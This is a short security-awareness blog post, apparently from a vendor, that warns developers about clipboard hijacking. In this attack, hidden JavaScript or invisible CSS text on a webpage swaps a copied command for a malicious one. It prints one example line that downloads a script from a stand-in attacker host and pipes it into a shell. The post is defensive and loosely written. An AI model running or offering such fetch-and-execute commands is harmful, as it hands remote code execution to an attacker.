You could be hacked if you’re copy-pasting commands from webpages, here’s how to avoid it.

A technologist working with Bleepingcomputer.com explained through demonstration that you should think twice about copying and pasting text from webpages. This technologist goes by the name Gabriel Friendlander explains that the developer may only realize their mistake after pasting the text which at that point may be too late. To illustrate this point in a clearer manner here is the direct text expanding on the topic 

In a simple proof of concept (PoC) published on his blog, Friedlander asks readers to copy a simple commandthat most sysadmins and developers would be familiar with:

Friedlander's HTML page with a simple command you can copy to clipboard

Now, paste what you copied from Friedlander's blog into a text box or Notepad, and the result is likely to leave you surprised what you get is:

curl http://attacker-domain:8000/shell.sh | sh

Not only do you get a completely different command present on your clipboard, but to make matters worse, it has a newline (or return) character at the end of it.

So what causes this to happen?

            The trick can be found within the JavaScript code hidden behind the PoC HTML page setup, as soon as you copy the text contained in the HTML document the code runs. This is why you should never directly copy and paste commands into your terminal Friedlander warns. A Reddit user presented an alternative example of this trick that requires no JavaScript it includes invisible text made with HTML and CSS styling that gets copied onto your clipboard when you copy the visible portions of the text. This means that commands could be sent to the computer invisible to the human eye. Best to paste your coding into a text editor first and then copy it from there, and even that could be risky business. Protecting your information is our top priority at Mi-Token and avoiding hickups like this could be detrimental for your privacy.